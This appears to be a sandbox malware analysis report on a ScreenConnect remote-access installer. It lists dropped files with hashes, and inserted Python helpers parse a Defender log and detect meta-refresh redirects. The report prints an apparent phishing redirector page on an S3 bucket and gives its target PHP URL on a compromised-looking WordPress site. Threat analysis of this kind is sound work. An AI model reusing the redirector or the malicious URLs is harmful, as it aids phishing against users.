                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI719A.tmp, Author: Joe Security
                                          Reputation:unknown
                                          Preview:...@IXOS.@.....@..zY.@.....@.....@.....@.....@.....@......&.{99E26C3F-C825-FDD0-DEE6-42CC1FB5697B}'.ScreenConnect Client (e6cb77284cf765aa)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{99E26C3F-C825-FDD0-DEE6-42CC1FB5697B}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (e6cb77284cf765aa)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{F7DC6ACE-2599-29C8-925C-5B3ACC994D1F}^.C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{E75F3825-615D-A6C3-18A8-A81116BE1B2A}f.C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{1D30660B-8729-B08B-2523-3D6361F833F5}c.C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe.@.......@.
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):207360
                                          Entropy (8bit):6.573348437503042
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                          SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                          SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                          SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:Composite Document File V2 Document, Cannot read section info
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):1.1614685388955261
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:4484F92BCB65974A6157694A9F3EB079
                                          SHA1:BC598E2C9DF19594F2DEA9E9C7F956A79F35363F
                                          SHA-256:ABB1A52A1FE0C231F95543FD253E4434E330A1A42348084CD4D662C27FCB455D
                                          SHA-512:101A270959A70F69AE3E9C371637DE7B7943DDA75CE94156DBB7FEEB6C071EA38064DA8D88A0B3E6F790E8ECAA1A79E1AE26F83D118889C89E2771DE9EDF4F44
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):454234
                                          Entropy (8bit):5.3561760708880675
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:87825254703C7F6C5CDAE02CC91D8FB9
                                          SHA1:213CB37705E22A1D99AF3E725C5B8AC7CADB814C
                                          SHA-256:FAB4FC938C29828BC45D0D9B312C9B01F3FE0B2B690CBBC56F1D2B05B4FAA8CF
                                          SHA-512:DA83FB045775F61EC035F90DAF36BDEC2648ADF8FB5E99370E1A94FC725C909A137C852B35A1B938AF21C492F1880C206B37F9A243229C756C0E12738FE67BA0
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                          Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:modified
                                          Size (bytes):4926
                                          Entropy (8bit):3.2479120712818554
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:97E42E8F77AA57CBDF183F24AE2646C7
                                          SHA1:88AD2014120DC61983C13A4EDFAED39345C1DF82
                                          SHA-256:6B2FA31403906009310165A39A35D4556A836F0103391EC29713DF2DEA4A651F
                                          SHA-512:9888554E4D78DDA57852D517DE662DA529B6826AFD9E6881AAC29B02299232F19CB4CDEDAEE9085F6BD562E291540F71DB01C09B494822BC45DD702D3E48FFB8
                                          Malicious:false
                                          Reputation:unknown
                                          Preview (decoded from UTF-16 LE; BOM and U+200E marks dropped):
                                          ------------------------------------------------------------------------------------------
                                          MpCmdRun: Command Line: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                           Start Time: Fri Oct 06 2023 11:35:29

                                          MpEnsureProcessMitigationPolicy: hr = 0x1
                                          WDEnable
                                          *********************************** WSC State Info *************************
                                          *********************************** AntiVirusProduct *************************
                                          displayName = [Windows Defender]
                                          pathToSignedProductExe = [windowsd
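The MpCmdRun log listed above is UTF-16 LE with a BOM (its File Type field says so), which is why the report only shows the Defender command line and the WSC state block rather than anything the sandbox could match directly. The following is an added triage helper, not part of the Joe Sandbox report or of Microsoft's tooling: it decodes such a log, splits the `MpCmdRun: Command Line:` value into the executable and its switches, and collects the `*** Section ***` / `key = [value]` pairs that describe the Windows Security Center state. The sample bytes are reconstructed from the preview above (the last line is cut off exactly where the preview is), and the parser tolerates that missing closing bracket. The list of state-changing switches is the author's own short list, not an exhaustive one.

```python
import re

# Constructed sample: the MpCmdRun log from the report's preview, re-encoded as
# UTF-16 LE with a BOM. The U+200E marks around the date are what real MpCmdRun
# logs contain; the final line is truncated just as in the report preview.
MPCMDRUN_LOG = b"\xff\xfe" + (
    "\r\n\r\n"
    + "-" * 90 + "\r\n"
    + 'MpCmdRun: Command Line: "C:\\Program Files\\Windows Defender\\mpcmdrun.exe" -wdenable\r\n'
    + " Start Time: \u200eFri \u200eOct \u200e06 \u200e2023 11:35:29\r\n"
    + "\r\n"
    + "MpEnsureProcessMitigationPolicy: hr = 0x1\r\n"
    + "WDEnable\r\n"
    + "*" * 35 + " WSC State Info " + "*" * 25 + "\r\n"
    + "*" * 35 + " AntiVirusProduct " + "*" * 25 + "\r\n"
    + "displayName = [Windows Defender]\r\n"
    + "pathToSignedProductExe = [windowsd"
).encode("utf-16-le")

# Switches that change Defender's protection state rather than just query it
# (author's own short list; -wdenable/-wddisable are the undocumented pair used
# by third-party AV installers, -RemoveDefinitions is documented).
STATE_CHANGING_SWITCHES = {"-wdenable", "-wddisable", "-removedefinitions"}

SECTION_RE = re.compile(r"^\*{3,}\s*(?P<name>[^*]+?)\s*\*{3,}$")
# "key = [value]" with the closing bracket optional so a truncated log still parses.
KV_RE = re.compile(r"^(?P<key>\w+)\s*=\s*\[(?P<value>[^\]]*)\]?$")


def decode_mpcmdrun_log(data: bytes) -> str:
    """Decode a BOM-prefixed UTF-16 log to text and strip bidi marks."""
    text = data.decode("utf-16")  # the 'utf-16' codec consumes the BOM and picks LE/BE from it
    return text.replace("\u200e", "").replace("\u200f", "")


def split_command_line(cmd: str):
    """Split the 'Command Line:' value into (exe_path, [switches])."""
    m = re.match(r'\s*"([^"]+)"\s*(.*)$', cmd)
    if m:
        return m.group(1), m.group(2).split()
    exe, _, rest = cmd.strip().partition(" ")
    return exe, rest.split()


def parse_mpcmdrun_log(text: str) -> dict:
    """Pull the command line, start time and WSC state sections out of the log."""
    result = {"command_line": None, "start_time": None, "sections": {}}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("MpCmdRun: Command Line:"):
            result["command_line"] = line.split("Command Line:", 1)[1].strip()
            continue
        if line.startswith("Start Time:"):
            result["start_time"] = line.split(":", 1)[1].strip()
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group("name")
            result["sections"].setdefault(current, {})
            continue
        m = KV_RE.match(line)
        if m and current is not None:
            result["sections"][current][m.group("key")] = m.group("value")
    return result


def state_changing_switches(command_line: str) -> list:
    """Return the switches from the command line that alter Defender state."""
    _, switches = split_command_line(command_line)
    return [s for s in switches if s.lower() in STATE_CHANGING_SWITCHES]


if __name__ == "__main__":
    parsed = parse_mpcmdrun_log(decode_mpcmdrun_log(MPCMDRUN_LOG))
    print("command line :", parsed["command_line"])
    print("state changes:", state_changing_switches(parsed["command_line"]))
    print("start time   :", parsed["start_time"])
    for name, kv in parsed["sections"].items():
        print(f"[{name}] {kv}")
```

Because the last value (`pathToSignedProductExe`) is cut off in the report, the parser records it as truncated text rather than guessing the rest; when working from the full log on disk the closing bracket will be present and the same regex still matches.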
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):32768
                                          Entropy (8bit):0.06873670885746685
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:63DBCD52C8ACCE5C2D321275FA8DF791
                                          SHA1:C8ECCB862A0A0FC09641C1E602223508E3590353
                                          SHA-256:68923491E84C61B84D6E0FEF8692063AFB52341C415133DBC62AC1E91DBDF43C
                                          SHA-512:3983C63022FE4F56951AFDB71A244D81F10A5880E6002826DB8ECAF5DF1EA0DD137D54109B3AACBD9D8EDE77E560E8B97E6AF67BB3AE638B00DED49D6BA025E2
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):69632
                                          Entropy (8bit):0.13446299018010885
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:638D3A90BF111387AB5B10E727C1A9FF
                                          SHA1:E7BE4C5D10FC465F5C76CF36DF7A1EAA4A0581A2
                                          SHA-256:F7D0D820BBD69F8FD206E7D94273D0D73AAF72C6E2E249DE65270B9E978F77C8
                                          SHA-512:C0FA291855CBBCD7DB1F71B8190EC16A7356E2291B59D063A57C2DB09457CF30303CD9E38CC56E11566C596DD657B035859912E73DBDE87D84AEB544D67E9A0E
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):512
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:Composite Document File V2 Document, Cannot read section info
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):1.5437225757381154
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:644367281CD503D49E6DA11645D067E2
                                          SHA1:00994EE923477EC1F49B0A00899454443A3486B9
                                          SHA-256:4162B7B3666C99287E3F98AE64DF5638517C2903617BAF9D460860EDE22D5BFA
                                          SHA-512:CB99B33F6E76BF019927DAF9EF817AD98AD7D14276CE283C8CA4E578E3016875FA617ADC7B9B01F8B675B33EFBFEA30E538B341BCF973716A150EF13E300DE3C
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:Composite Document File V2 Document, Cannot read section info
                                          Category:dropped
                                          Size (bytes):32768
                                          Entropy (8bit):1.2371425407187278
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:C33C4081AA596BA421202AE7A395F851
                                          SHA1:8F1BAFA07DBAA34D6EFCE7CF57523CFA0CB77B1F
                                          SHA-256:41C5A81555D32CCDA8AA58A7F86632CFE56475E1D3A95BD2FCBA1B9AC503FAA9
                                          SHA-512:34AFCAD30F7B3F10E875E1473E0EA27983BEDE3941664F3BF6A44EB1F900E4E406C804B2CDFA88B812B5B93E6149659683201A5B2DADF01D9BA5DDFD4F27DE8B
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:downloaded
                                          Size (bytes):255
                                          Entropy (8bit):5.621617474060547
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:23A5591405C1075B4E2E4D8A8333EC8B
                                          SHA1:610276C223E80E61504AD15798AB15B41E5E422A
                                          SHA-256:D77D9D6393AABE39E3FC2B3E121F985AAC63E10FF8ECDA3A0581A2B3C492E23D
                                          SHA-512:45012719EB21369A47C7FF6ECAEB5E907824EE068E26ACBAE4C68441502987173A2F108A3B5C91A94BD189BFA507514878DBEF91085F1003A00A0B6F0094700C
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/favicon.ico
                                          Preview:<?xml version="1.0" encoding="UTF-8"?>.<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>H1DBR3B2QCSZ566X</RequestId><HostId>A2uoJbyrOrlCBQvLvsnb8aLgupmrRgbJZLb1eg/WfI6XP15Yyw4HCZh1SfWvE75mF2TmiUnvEkY3vkbE/MqJJw==</HostId></Error>
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):1905
                                          Entropy (8bit):4.556006234037668
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:C3947CB9869BFF06A70D3E178C92CA37
                                          SHA1:BA9312C6EEFCAA2B55C30369BE880CB4DE821C68
                                          SHA-256:85D20686AE8B52153A474303F995AB6BB6B99DA67CF2E0EAA0A5E4880FD7F56A
                                          SHA-512:6C6C1188AABA3E967E0E2FAF47BE852D578D7698054747AC05AA2B13F6ACF5C6CD78C40F641756A4303A27042B6AFD1DF1B2BB7B5D940F07F865FCC64421FB7F
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html
                                          Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta http-equiv="refresh" content="1;url=https://silvervalleyrealestategh.com/wp-content/uploads/elementor/thumbs/proce.php">.. <title>Redirecting...</title>.. <style>.. body {.. font-family: Arial, sans-serif;.. text-align: center;.. padding-top: 50px;.. background-color: #f3f3f3;.. }.. .content {.. width: 80%;.. margin: auto;.. padding: 20px;.. background-color: white;.. border-radius: 10px;.. box-shadow: 0 4px 8px rgba(0,0,0,0.1);.. }.. .spinner {.. border: 4px solid #f3f3f3; /* Light grey */.. border-top: 4px solid #3498db; /* Blue */.. border-radius: 50%;.. width: 50px;.. height: 50px;.. animation: spin 2s linear infinite;.. margin: auto;.. }.. @keyframes spin {..
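The page fetched from the S3 bucket is a bare redirector: a `<meta http-equiv="refresh">` that, after one second, sends the browser to a `.php` file under a WordPress `wp-content/uploads/` directory on an unrelated domain. That pattern (static bucket, immediate client-side refresh, PHP served from an uploads folder that should only hold media) is what a triage script should surface. The code below is an added example, not part of the Joe Sandbox report or any project's code: it extracts meta-refresh targets with the standard-library HTML parser, handles the content-attribute variants browsers accept (`5`, `1;url=...`, `0; URL='...'`), and assesses the hop with a few heuristics. The sample HTML is the head of the file as shown in the report preview; the flag names and the heuristic list are the author's own choices.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Sample: the head of the downloaded redirector as shown in the report preview
# (the remainder of the page is only CSS for a spinner). The source URL is the
# sample URL from the report.
SRC_URL = "https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html"
SAMPLE_HTML = """<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="refresh" content="1;url=https://silvervalleyrealestategh.com/wp-content/uploads/elementor/thumbs/proce.php">
    <title>Redirecting...</title>
"""


class _MetaRefreshFinder(HTMLParser):
    """Collect the content attribute of every <meta http-equiv="refresh">."""

    def __init__(self):
        super().__init__()
        self.contents = []

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        a = {k: (v or "") for k, v in attrs}  # HTMLParser already lowercases names
        if a.get("http-equiv", "").strip().lower() == "refresh" and "content" in a:
            self.contents.append(a["content"])


def parse_refresh_content(content: str):
    """Return (delay_seconds, url_or_None) for a meta refresh content value.

    Accepts the forms browsers tolerate: a bare delay, "delay;url=X",
    "delay, URL='X'", and a URL without the url= prefix.
    """
    m = re.match(r"\s*(\d+(?:\.\d*)?)\s*(?:[;,]\s*(.*))?$", content, re.S)
    if not m:
        return None, None
    delay = float(m.group(1))
    rest = (m.group(2) or "").strip()
    if rest[:3].lower() == "url":
        rest = rest[3:].lstrip()
        if rest.startswith("="):
            rest = rest[1:].strip()
    rest = rest.strip("'\"").strip()
    return delay, rest or None


def find_meta_refresh(html: str) -> list:
    """Return [(delay, url), ...] for every meta refresh in the document."""
    finder = _MetaRefreshFinder()
    finder.feed(html)
    finder.close()
    return [parse_refresh_content(c) for c in finder.contents]


def assess_redirect(src_url: str, dst_url: str) -> list:
    """Heuristic flags for a redirect hop (author's own list, not exhaustive)."""
    s, d = urlsplit(src_url), urlsplit(dst_url)
    flags = []
    if (s.hostname or "").lower() != (d.hostname or "").lower():
        flags.append("cross-domain")
    if (s.hostname or "").lower().endswith(".amazonaws.com"):
        flags.append("source-is-s3")  # throwaway bucket fronting the lure
    path = d.path.lower()
    if path.endswith(".php") and "/wp-content/uploads/" in path:
        flags.append("php-under-wp-uploads")  # uploads dirs should serve media, not code
    return flags


if __name__ == "__main__":
    for delay, url in find_meta_refresh(SAMPLE_HTML):
        print(f"refresh after {delay}s -> {url}")
        print("flags:", assess_redirect(SRC_URL, url))
```

The parser works on the truncated preview as well as on a complete page because `HTMLParser` is forgiving about unclosed elements; for a full capture you would feed it the whole response body and also look for script-driven redirects (`location.href`, `location.replace`), which a meta-refresh check alone does not cover.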
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 495 x 149, 8-bit/color RGBA, non-interlaced
                                          Category:downloaded
                                          Size (bytes):23447
                                          Entropy (8bit):7.981767348352221
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:39F969A5B32250DE81DE285985CB35BD
                                          SHA1:4B84F978D53720937C0F6F4FA6E5E003E421D8A6
                                          SHA-256:80B8D085E9CE86086B04E79CCB31232A4619EDB3C37885AFFD82CBF40C004513
                                          SHA-512:9661AE4352A4F8BEBBD30665743135B9D8ECFAA4EC528CD2D081350BFDDC7131E1E7C862C97ADB60A085BDC011F017A7A549186A336B71DBEAC7462394E1E82D
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://ci3.googleusercontent.com/meips/ADKq_NZi8R4m6H8EJruwBzxCqPKVPzWCU6p8FRwtcx3ScqmC0alrzNrsKe32Pl2h3WKXSwL-bd3kecKFfZJddwmVxlPRLfISpCAutfNswBHKsELm687KIoqZs9-Ogbs9nNrClyddA1vzBISt721ohcFF82CuM-_6WGxNRw=s0-d-e1-ft
                                          Preview:.PNG........IHDR.............qGr.....sBIT....|.d.....bKGD............ .IDATx..yXUU.......bA)..i.V ..Q(.....Y.(.9.&...%....&&h...S....(.&.X...C..B.Q.......s..^.A..{...=....}...Z...........i>..Q7@FFFFFF.f..[FFFFF..!.o......f.,.eddddd........if..[FFFFF..!.o......f.,.eddddd........if..[FFFFF..!.o......f.,.eddddd........if..[FFFFF..!.o......f.,.eddddd........if..[FFFFF......8.....v.s...H.y@.h.@...@...8..J._.T......#.....u...Z........{....0F.GR'.#,.Lx...<.d{.h...6..n..NK....q.^.E...;.s..;..MV^>y.+..)....9`?p..}x%...oYFFFF..!.o-...]..z h.....(......./u...6.;..93.......[......(.....K(--.@G.%.z.0l.....q;tZ......s.._...W29...|.5G...B......<..JT..Cu......i8.....Z...`..I.....v..g.k....{....),*....\......u...|..w.F....a....,:..93l.:..%.........8.........<..Tl;.p ..7-.p....G.?Rx.Q`...............1..._y.....:.=..q.|....u..Rl.w._o+\..d./...G...#........ ...?..@\]......L..,.w=...2...A....k.)^..:...e|y.;.......<P..k.....E.ujd..b.s/<.:0zH..Z.%.$[.O....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (10001)
                                          Category:downloaded
                                          Size (bytes):67415
                                          Entropy (8bit):5.508375134858067
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:9BD4F7CB380C2D64BD70138238114F7A
                                          SHA1:0DCD746FD3B50AE9BD8E215855091354759E7158
                                          SHA-256:F3AD41A7D8D3FC1D4CDC80D1374A725D8F40CDC32DBA2F03584CE190E6FEE0CF
                                          SHA-512:9FFC044B4B6C7765BA963028BA27A5AF8670F99EA52EDB782227F68BF74E995EE80A820F9D47C8121F84E33A3EC6237DDC983895C895BAF55E79B8C101B38288
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://electroagrotech.com.ua/themes/custom/ssa_core/favicon.ico
                                          Preview:<!DOCTYPE html>.<html lang="uk">.<head>..<meta charset="UTF-8">..<link rel="profile" href="https://gmpg.org/xfn/11">..<link rel="pingback" href="https://electroagrotech.com.ua/xmlrpc.php">...<title>........ .. ........ &#8211; electroagrotech</title>.<meta name='robots' content='max-image-preview:large' />.<link rel='dns-prefetch' href='//fonts.googleapis.com' />.<link rel="alternate" type="application/rss+xml" title="electroagrotech &raquo; ......." href="https://electroagrotech.com.ua/feed/" />.<link rel="alternate" type="application/rss+xml" title="electroagrotech &raquo; ..... .........." href="https://electroagrotech.com.ua/comments/feed/" />.<link rel='stylesheet' id='twb-open-sans-css' href='https://fonts.googleapis.com/css?family=Open+Sans%3A300%2C400%2C500%2C600%2C700%2C800&#038;display=swap&#038;ver=6.5.4' type='text/css' media='all' />.<link rel='stylesheet' id='twbbwg-global-css' href='https://electroagrotech.com.ua/wp-content/plugins
                                          No static file info